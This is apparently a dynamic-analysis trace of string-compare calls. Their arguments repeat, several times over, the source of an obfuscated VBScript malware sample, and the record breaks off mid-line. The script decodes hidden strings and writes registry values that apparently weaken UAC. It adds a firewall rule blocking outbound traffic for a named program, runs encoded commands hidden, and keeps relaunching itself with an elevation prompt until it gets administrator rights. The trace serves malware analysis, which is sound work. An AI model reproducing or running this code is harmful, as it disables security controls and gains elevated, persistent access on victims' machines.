bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.367] wcsncmp (_String1="Rule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.367] wcsncmp (_String1="ule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.367] wcsncmp (_String1="le.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.367] wcsncmp (_String1="e.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.367] wcsncmp (_String1=".Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 